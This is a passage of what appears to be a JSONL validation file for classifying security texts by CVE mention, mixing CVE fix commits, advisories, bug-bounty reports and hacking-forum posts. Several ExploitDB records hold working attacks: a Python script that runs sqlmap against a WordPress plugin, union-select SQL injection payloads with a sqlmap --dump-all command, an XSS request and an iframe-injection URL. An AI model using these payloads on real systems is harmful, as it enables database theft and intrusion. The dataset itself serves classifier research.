(_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___\n (___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______)\n\n\n\t\t\t\t\t\t\t\t[+] Perfect Survey - SQL Injection\n\t\t\t\t\t\t\t\t[@] Developed by Ron Jost (Hacker5preme)\n\n'''\nprint(banner)\n\nimport argparse\nfrom datetime import datetime\nimport os\n\n# User-Input:\nmy_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nwp_path = args.PATH\n\nprint('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))\nprint('[*] Payload for SQL-Injection:')\nexploitcode_url = r'sqlmap \"http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *\" '\nprint(' Sqlmap options:')\nprint(' -a, --all Retrieve everything')\nprint(' -b, --banner Retrieve DBMS banner')\nprint(' --current-user Retrieve DBMS current user')\nprint(' --current-db Retrieve DBMS current database')\nprint(' --passwords Enumerate DBMS users password hashes')\nprint(' --tables Enumerate DBMS database tables')\nprint(' --columns Enumerate DBMS database table column')\nprint(' --schema Enumerate DBMS schema')\nprint(' --dump Dump DBMS database table entries')\nprint(' --dump-all Dump all DBMS databases tables entries')\nretrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')\nexploitcode = exploitcode_url + retrieve_mode + ' --answers=\"follow=Y\" --batch -v 0'\nos.system(exploitcode)\nprint('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))", "source": "exploitdb", "timestamp": "2022-02-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a8a09caf8ccb0fc238c9", "text": "CVE: CVE-2022-32547\n\n[{'lang': 'en', 'value': \"In ImageMagick, there is load of misaligned address for type 'double', which requires 8 byte alignment and for type 'float', which requires 4 byte alignment at MagickCore/property.c. Whenever crafted or untrusted input is processed by ImageMagick, this causes a negative impact to application availability or other problems related to undefined behavior.\"}]\n\nFix commit: fix #5033: runtime error: load of misaligned address (#5034)\n\n* fix Division by zero in XMenuWidget() of MagickCore/widget.c\r\n\r\n* Fix memory leak in AnimateImageCommand() of MagickWand/animate.c and DisplayImageCommand() of MagickWand/display.c\r\n\r\n* fix Division by zero in ReadEnhMetaFile() of coders/emf.c\r\n\r\n* Resolve conflicts\r\n\r\n* fix issue: outside the range of representable values of type 'unsigned char' at coders/psd.c:1025\r\n\r\n* fix error: 4e+26 is outside the range of representable values of type 'unsigned long' at coders/pcl.c:299\r\n\r\n* fix #5033:runtime error: load of misaligned address\r\n\r\nCo-authored-by: zhailiangliang ", "source": "cvefixes", "timestamp": "2022-06-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "94a920e9207ad2f83262", "text": "In my case i didn’t use the && because it is interpreted as the GET request parameter. I recommend you try to bypass with another character.", "source": "hackthebox", "timestamp": "2022-08-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "109f10c26954f4a4a236", "text": "CVE: CVE-2022-0521\n\n[{'lang': 'en', 'value': 'Access of Memory Location After End of Buffer in GitHub repository radareorg/radare2 prior to 5.6.2.'}]\n\nFix commit: Improve boundary checks to fix oobread segfaults ##crash\n\n* Reported by Cen Zhang via huntr.dev\n* Reproducer: bins/fuzzed/javaoob-havoc.class", "source": "cvefixes", "timestamp": "2022-02-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1b77863580fd10e251e9", "text": "Improper Access Control in Apache Tomcat\n\n[Severity: HIGH]\n\nApache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an \"httpoxy\" issue. NOTE: the vendor states \"A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388\"; in other words, this is not a CVE ID for a vulnerability.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "86fbabcb9877d9febd0b", "text": "I checked on Discord and it is a different WMI command, as @hajdarevicedin mentioned. In CLI: wmic OS get SerialNumber In PowerShell: Get-WmiObject -Class Win32_OperatingSystem | select SerialNumber", "source": "hackthebox", "timestamp": "2022-09-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e3e9aacdb4483c7f8cd1", "text": "Possible tools to find malwares responsible for backdoor access, use these tools from your Pentesting menu: 1. rkhunter 2. chkrootkit 3. Lynis 4. ClamAV (optional - install it) These would list all available or active malwares on your system known to Parrot OS .", "source": "parrotsec", "timestamp": "2022-02-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a981d4f21190efdd991b", "text": "AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_\n\n# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path\n# Date: 06/07/2023\n# Exploit Author: Idan Malihi\n# Vendor Homepage: https://www.avg.com\n# Software Link: https://www.avg.com/en-ww/homepage#pc\n# Version: 7.5\n# Tested on: Microsoft Windows 10 Pro\n# CVE : CVE-2023-36167\n\n#PoC\n\nC:\\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\"\"\nAVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\\Program Files (x86)\\Grisoft\\AVG Anti-Spyware 7.5\\guard.exe Auto\n\nC:\\Users>sc qc \"AVG Anti-Spyware Guard\"\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: AVG Anti-Spyware Guard\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Grisoft\\AVG Anti-Spyware 7.5\\guard.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : AVG Anti-Spyware Guard\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n\nC:\\Users>systeminfo\n\nHost Name: DESKTOP-LA7J17P\nOS Name: Microsoft Windows 10 Pro\nOS Version: 10.0.19042 N/A Build 19042\nOS Manufacturer: Microsoft Corporation", "source": "exploitdb", "timestamp": "2023-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4057f0ed0e6baa46010c", "text": "Yeah whenever you have an email from a so-called Parrot Dev, u just need to send and email like suk a dik . It worked for me everytime lol", "source": "parrotsec", "timestamp": "2023-12-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "562b77f9a8762adbddf4", "text": "CVE: CVE-2022-33981\n\n[{'lang': 'en', 'value': 'drivers/block/floppy.c in the Linux kernel before 5.17.6 is vulnerable to a denial of service, because of a concurrency use-after-free flaw after deallocating raw_cmd in the raw_cmd_ioctl function.'}]\n\nFix commit: floppy: disable FDRAWCMD by default\n\nMinh Yuan reported a concurrency use-after-free issue in the floppy code\nbetween raw_cmd_ioctl and seek_interrupt.\n\n[ It turns out this has been around, and that others have reported the\n KASAN splats over the years, but Minh Yuan had a reproducer for it and\n so gets primary credit for reporting it for this fix - Linus ]\n\nThe problem is, this driver tends to break very easily and nowadays,\nnobody is expected to use FDRAWCMD anyway since it was used to\nmanipulate non-standard formats. The risk of breaking the driver is\nhigher than the risk presented by this race, and accessing the device\nrequires privileges anyway.\n\nLet's just add a config option to completely disable this ioctl and\nleave it disabled by default. Distros shouldn't use it, and only those\nrunning on antique hardware might need to enable it.\n\nLink: https://lore.kernel.org/all/000000000000b71cdd05d703f6bf@google.com/\nLink: https://lore.kernel.org/lkml/CAKcFiNC=MfYVW-Jt9A3=FPJpTwCD2PL_ULNCpsCVE5s8ZeBQgQ@mail.gmail.com\nLink: https://lore.kernel.org/all/CAEAjamu1FRhz6StCe_55XY5s389ZP_xmCF69k987En+1z53=eg@mail.gmail.com\nReported-by: Minh Yuan \nReported-by: syzbot+8e8958586909d62b6840@syzkaller.appspotmail.com\nReported-by: cruise k \nReported-by: Kyungtae Kim \nSuggested-by: Linus Torvalds \nTested-by: Denis Efremov \nSigned-off-by: Willy Tarreau \nSigned-off-by: Linus Torvalds ", "source": "cvefixes", "timestamp": "2022-06-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "711f376a4cb7b8258951", "text": "How to get back Maltego tool into Kali machine\n\nI am missing Maltego into my Kali machine, I did update & upgrade and I lost Maltego. Is there any way that I can get back Maltego into my Kali machine? it was the default tool but now it’s missing. anyone who can help, please. thanks.", "source": "hackersploit", "timestamp": "2022-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "cdcdd3a147f14d05d37a", "text": "[Insecure Storage of Sensitive Information] Splunk Sensitive Information Disclosure @████████\n\nHi Team,\n\nHope you are doing great.\nI got a domain that contains Splunk Sensitive Information Disclosure @██████████\nPoC:\nhttps://███████/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json\n█████████\n\nSplunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.\n\nReference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11409\n - https://github.com/kofa2002/splunk\n - https://www.exploit-db.com/exploits/44865/\n - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148\n\n## Impact\n\nSplunk Sensitive Information Disclosure\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nOpen this link:\nhttps://█████████/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-02-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9df7e24bf1a75e4ca9ef", "text": "Hi can anyone DM on overflown, I already have the exploit localy but doesnt work in the machine", "source": "hackthebox", "timestamp": "2022-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3bd7773dc766a5c73d58", "text": "I’m having trouble getting a reverse shell for flag5. I have the Tomcat username and password, I have tried it with several metasploit methods and nothing, the only thing I have managed is to create a web shell by uploading a file to the tomcat page and from there I got the flag4, but I can’t find the way to get a reverse shell. Any ideas?", "source": "hackthebox", "timestamp": "2022-12-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "cec244e1e81e546977c1", "text": "Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated\n\n# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated\n# Date: 20/01/2023\n# Exploit Author: Rahul Patwari\n# Vendor Homepage: https://phpgurukul.com/\n# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip\n# Version: 1.0\n# Tested on: XAMPP / Windows 10\n# CVE : CVE-2023-23162\n\n# Proof of Concept:\n\n# 1- Install The application Art Gallery Management System Project v1.0\n# 2- Navigate to the product page by clicking on the \"ART TYPE\" by selecting any of the categories on the menu.\n# 3- Now insert a single quote ( ' ) on \"cid\" parameter to break the database query, you will see the output is not shown.\n# 4- Now inject the payload double single quote ('') in the \"cid\" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output.\n# 5- Now find how many columns are returned by the SQL query. this query will return 6 columns.\n Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures\n\n# 6- for manually getting data from the database insert the below payload to see the user of the database.\n payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs\n\n# 7- for automation using \"SQLMAP\" intercept the request and copy this request to a file called \"request.txt\".\n# 8- now to get all database data use the below \"sqlmap\" command to fetch all the data.\n Command: sqlmap -r request.txt -p cid --dump-all --batch\n\n# Go to this url \"\nhttps://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs\n\"", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "da9c80cc1869f3a775a0", "text": "Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)\n\n# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)\n# Date: 1/3/2022\n# Exploit Author: Momen Eldawakhly (CyberGuy)\n# Vendor Homepage: https://www.zyxel.com\n# Version: ZyWALL 2 Plus\n# Tested on: Ubuntu Linux [Firefox]\n# CVE : CVE-2021-46387\n\nGET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1\nHost: vuln.ip:8080\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1", "source": "exploitdb", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9fcd5acb74d21813db07", "text": "There are various security settings on a DNS server. Among other things, you can specify whether a zone transfer should be allowed for all servers or only for certain servers (allow-transfer). If a zone transfer is allowed, you can transfer the zone with “dig axfr”. If the zone transfer is not allowed, you have to bruteforce the zone. Hint: Start with the smallest list.", "source": "hackthebox", "timestamp": "2022-02-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "98f35e866c7f932b74f9", "text": "interssting to change the mac adress. the best I guess is to buy a new laptop phone with a prepaid 4g internet connection. then use linux with proxychains that use tor connection and change also your dns. But you are right I didn’t think of changing your mac adress.", "source": "hackersploit", "timestamp": "2022-07-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b55f01886a2494c42de7", "text": "Stored XSS using uppercase characters in HTMLEditor\n\n[Severity: MEDIUM]\n\nA malicious content author could add a Javascript payload to the href attribute of a link. A similar issue was identified and fixed via CVE-2022-28803. However, the fix didn't account for the casing of the href attribute. An attacker must have access to the CMS to exploit this issue.", "source": "github_advisory", "timestamp": "2022-11-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "49ba57d7290e51127729", "text": "Processor instruction emulation\n\nGood day, Recently found out that CPU instruction \"kmovd\" from AVX512BW set is successfully executed on windows 10,(even on Sandy Bridge CPU). But same instruction with same arguments throws exception \"Illegal instruction\" on Windows 7 SP1 x64. I installed all updates(270+ at the moment), installed all VC packs x64 and x86 up to 2005 versions. But exception persists. Can this be solved by upgrading or installing some virtualization update for Windows?", "source": "go4expert", "timestamp": "2022-09-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "064be52e26870e0ae676", "text": "Stuck for a few days at Elasticity. I’m pretty sure I’m aiming at the correct ports locally but it keeps timing out. Please DM me if you have a pointer or two", "source": "hackthebox", "timestamp": "2023-03-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7254bda5b312e27ca88c", "text": "I will give my contribution to this exercise because it is extremely poorly formulated, causing huge problems with the construction of the usernames and password lists. There it goes: Install username-anarchy using the command: git clone GitHub - urbanadventurer/username-anarchy: Username tools for penetration testing (something that should already be installed in pwnbox) Enter the username-anarchy folder and create a usernames list using the command .username-anarchy user > user.txt (change user for the user you used in the past, “it’s already clear here on the forum”). Save the list as usernames.txt Create a password list. Start cupp and put only the character’s first name (the first line). Also includes add special characters and l33t mode. Run hydra by passing the list of usernames and passwords you created with the command you leared in the last few lessons. The user is something like (****.*****). Use usernames.txt and the passwords.txt that you did. Don’t forget to use -u and -f flags. The ftp part is just the same steps as in the Service Authentication Brute Forcing lesson. I hope the hack the box team create more explanatory exercises, as the learning material is very good, but spending hours and hours running a list of words to finish an exercise is sad.", "source": "hackthebox", "timestamp": "2022-04-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5183635d4a54a6b31356", "text": "CVE: CVE-2022-23561\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would cause a write outside of bounds of an array in TFLite. In fact, the attacker can override the linked list used by the memory allocator. This can be leveraged for an arbitrary write primitive under certain conditions. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: [lite] add validation check for sparse fully connected\n\nPiperOrigin-RevId: 417629354\nChange-Id: If96171c4bd4f5fdb01d6368d6deab19d1c9beca7", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "109b42120f9d740b2288", "text": "STARFACE 7.3.0.10 - Authentication with Password Hash Possible\n\nExploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible\nAffected Versions: 7.3.0.10 and earlier versions\nFixed Versions: -\nVulnerability Type: Broken Authentication\nSecurity Risk: low\nVendor URL: https://www.starface.de\nVendor Status: notified\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004\nAdvisory Status: published\nCVE: CVE-2023-33243\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243\n\n\nIntroduction\n============\n\n\"When functionality and comfort come together, the result is a\nstate-of-the-art experience that we've dubbed 'comfortphoning'. It's a\nsecure, scalable digital communication solution that meets every need\nand wish. STARFACE is easy to integrate into existing IT systems and\nflexibly grows with your requirements.\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nThe image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from\nthe vendor's homepage [1]. The included files can be further examined by\neither extracting the contents or running the image in a virtual\nmachine. The web interface of the PBX uses the JavaScript file at the\nfollowing path to submit the login form:\n\n------------------------------------------------------------------------\njs/prettifier.js\n------------------------------------------------------------------------\n\nThe following two lines of the JavaScript file \"prettifier.js\" add the\ntwo parameters \"secret\" and \"ack\" to the form before being submitted:\n\n------------------------------------------------------------------------\n$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));\n$form(document.forms[0]).add('ack', defaultVals.k);\n------------------------------------------------------------------------\n\nThe JavaScript object \"defaultVals\" is included in the web application's\nsource text. While the value of \"defaultVals.k\" was found to be the\nstatic hash of the PBX version, the value of \"defaultVals.bk\" contains a\nnonce only valid for the currently used session. Therefore, the form\nparameter \"ack\" is always the same value. For the form value \"secret\"\nthe function \"createHash()\" is called with different arguments. The\nvalue of \"defaultVals.isAd\" is set to \"false\" when login via Active\nDirectory is disabled. The parameters \"liv\" and \"lpv\" contain the\nusername and password entered into the form respectively.\n\n------------------------------------------------------------------------\nconst createHash = function (isAD, user, pass, nonces) {\n if (isAD) {\n return forAD.encode(user + nonces + pass);\n }\n return user + ':' + forSF(user + nonces + forSF(pass));\n};\n------------------------------------------------------------------------\n\nThe expression right after the second return statement is the\nimplementation used when Active Directory login is disabled which is the\ndefault setting. The return value is composed of the username separated\nvia a colon from a value built using the \"forSF()\" function. The\n\"forSF()\" function was found to calculate the SHA512 hash value. When\nconsidering the arguments passed to the function, the hash is calculated\nas follows:\n\n------------------------------------------------------------------------\nSHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))\n------------------------------------------------------------------------\n\nAs can be seen, instead of the cleartext password the SHA512 hash of the\npassword is used in the calculation. In conclusion, for the form value\n\"secret\" the following value is transmitted:\n\n------------------------------------------------------------------------\nusername + \":\" + SHA512(\n username + defaultVals.k + defaultVals.bk + SHA512(password)\n)\n------------------------------------------------------------------------\n\nIf the SHA512 hash of a user's password is known, it can be directly\nused in the calculation of the \"secret\" during the login process.\nKnowledge of the cleartext password is not required.\n\nThis finding was al", "source": "exploitdb", "timestamp": "2023-06-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "015c19133a86ef777f8a", "text": "CVE: CVE-2022-29251\n\n[{'lang': 'en', 'value': 'XWiki Platform Flamingo Theme UI is a tool that allows customization and preview of any Flamingo-based skin. Starting with versions 6.2.4 and 6.3-rc-1, a possible cross-site scripting vector is present in the `FlamingoThemesCode.WebHomeSheet` wiki page related to the \"newThemeName\" form field. The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, and 13.10.3. The easiest available workaround is to edit the wiki page `FlamingoThemesCode.WebHomeSheet` (with wiki editor) according to the suggestion provided in the GitHub Security Advisory.'}]\n\nFix commit: XWIKI-19294: Fix bad escaping", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "90742b3552a37a24ca75", "text": "If I am not misunderstanding, that may require you to change the codebase that powers the car. There is a possibility that the car you are targeting may have code written in C, C++ and Assembly.", "source": "parrotsec", "timestamp": "2023-01-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7bb134ed1365ae5d09fd", "text": "Wordpress Plugin Elementor 3.5.5 - Iframe Injection\n\n# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection\n# Date: 28.08.2023\n# Exploit Author: Miguel Santareno\n# Vendor Homepage: https://elementor.com/\n# Version: < 3.5.5\n# Tested on: Google and Firefox latest version\n# CVE : CVE-2022-4953\n\n# 1. Description\nThe plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.\n\n\n# 2. Proof of Concept (PoC)\nProof of Concept:\nhttps://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K", "source": "exploitdb", "timestamp": "2023-09-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "eb3926aad6313695dd0d", "text": "CVE: CVE-2022-2339\n\n[{'lang': 'en', 'value': \"With this SSRF vulnerability, an attacker can reach internal addresses to make a request as the server and read it's contents. This attack can lead to leak of sensitive information.\"}]\n\nFix commit: Merge pull request #2495 from nocodb/develop\n\nPre-release 0.92.0", "source": "cvefixes", "timestamp": "2022-07-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7beebebed0831ebe5ce0", "text": "[Business Logic Errors] CVE-2023-27538: SSH connection too eager reuse still\n\nlibcurl would reuse a previously created connection even when an SSH related option had been changed that should have prohibited reuse.\n\nlibcurl keeps previously used connections in a connection pool for subsequent transfers to reuse if one of them matches the setup. However, two SSH settings were left out from the configuration match checks, making them match too easily.\n\n## Hackerone report\n#1898475\n\n## Impact\n\nConnection reuse when different ssh keys are specified.", "source": "hackerone", "timestamp": "2023-04-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5d2ca3544c1156cb75f4", "text": "CVE: CVE-2022-0913\n\n[{'lang': 'en', 'value': 'Integer Overflow or Wraparound in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: checkout shipping address validation - max chars allowed", "source": "cvefixes", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b2f2ebf7a0c9d04e0c58", "text": "Ansible password prompts could expose passwords\n\n[Severity: HIGH]\n\nA data disclosure flaw was found in ansible. Password prompts in ansible-playbook and ansible-cli tools could expose passwords with special characters as they are not properly wrapped. A password with special characters is exposed starting with the first of these special characters. The highest threat from this vulnerability is to data confidentiality.\n\nThis CVE exists due to an incomplete fix for CVE-2019-10206.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ca8e7e01f5d92f4b156b", "text": "Hi MunAsqah, I have spent a week on this. could you please help me with the last question about DNS lab. thanks", "source": "hackthebox", "timestamp": "2023-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "65816ffd21f992a2f48a", "text": "CVE: CVE-2022-31093\n\n[{'lang': 'en', 'value': 'NextAuth.js is a complete open source authentication solution for Next.js applications. In affected versions an attacker can send a request to an app using NextAuth.js with an invalid `callbackUrl` query parameter, which internally is converted to a `URL` object. The URL instantiation would fail due to a malformed URL being passed into the constructor, causing it to throw an unhandled error which led to the **API route handler timing out and logging in to fail**. This has been remedied in versions 3.29.5 and 4.5.0. If for some reason you cannot upgrade, the workaround requires you to rely on Advanced Initialization. Please see the documentation for more.'}]\n\nFix commit: test: add test for invalid `callbackUrl` handling", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8bd5790f4791a7c702e9", "text": "Hi i`ve been reading this topic in order to answer 3 questions: How many files exist on the system that have the “.bak” file extension? How many files exist on the system that have the “.log” file extension? How many total packages are installed on the target system? So i use this commands: find / -name “*.bak” 2>/dev/null | wc -l find / -name “*.log” 2>/dev/null | wc -l apt list --installed | wc -l The results of the output are: 1 136 3602 The 3 results are incorrect answers… i dont understand what is wrong, can sombody help me? I know the answer for question number 1 is 4 by reading this topic but i can only obtein 1 as an output.", "source": "hackthebox", "timestamp": "2022-01-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "deccee3f5cd1a572ad33", "text": "Make sure you’ve identified ALL of the vulnerable applications on the box…one of them will give you what you want…don’t just focus on the one thing", "source": "hackthebox", "timestamp": "2022-01-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5b6c09f88e4dff98fbf5", "text": "Information Exposure in Apache Tapestry\n\n[Severity: HIGH]\n\nInformation Exposure vulnerability in context asset handling of Apache Tapestry allows an attacker to download files inside WEB-INF if using a specially-constructed URL. This was caused by an incomplete fix for CVE-2020-13953. This issue affects Apache Tapestry Apache Tapestry 5.4.0 version to Apache Tapestry 5.6.3; Apache Tapestry 5.7.0 version and Apache Tapestry 5.7.1.", "source": "github_advisory", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2d425b09b1b0deeda0d3", "text": "I went ahead and followed you but Im unsure how to send an invite for the team… If you send a “join request” ill accept and then follow up with the team discord.", "source": "hackthebox", "timestamp": "2022-09-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3b500d32a2a22f27b750", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "514022df1e3212ec1134", "text": "Hello, did you find a solution ? I have the same problem", "source": "hackthebox", "timestamp": "2023-01-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "23f226d077b68cd725f4", "text": "What are the best free resources to learn Parrot OS ethical hacking\n\nHello guys, I’m looking for a complete comprehensive free course to learn ethical hacking and cybersecurity skills for Linux. Ive been trying to find something complete but it can’t seem to find good resources and if I happen to find some “free”, it turns out you have to pay to go deep into the topics otherwise you only get a glance of whats it about. One of the promising pages ive found is null byte but kinda seems not in order for someone who wants to learn from scratch and videos are sometimes from 4-6 years ago", "source": "parrotsec", "timestamp": "2022-05-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "aada01c08cc5f87f309f", "text": "hi there. the user to access the tomcat manager, is it tomcat or a different user? I am digging on log files and conf files accessible by user barry/group adm, but no luck", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e706888757c3beb00ad4", "text": "CVE: CVE-2021-41162\n\n[{'lang': 'en', 'value': 'Combodo iTop is a web based IT Service Management tool. In 3.0.0 beta releases prior to beta6 the `ajax.render.php?operation=wizard_helper` page did not properly escape the user supplied parameters, allowing for a cross site scripting attack vector. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: N°4362 - XSS in ajax.render.php?operation=wizard_helper on develop", "source": "cvefixes", "timestamp": "2022-04-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2acc15a58c36fb327d61", "text": "Airodump-ng command and host discovery\n\nHow exactly does airodump-ng command allows you to discover the hosts that are connected to the network. I understand the AP is transmitting beacons all the time so they could be connected to, but I don’t understand why the command can also output the hosts that are connected to it… Thanks in advance", "source": "hackersploit", "timestamp": "2022-10-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
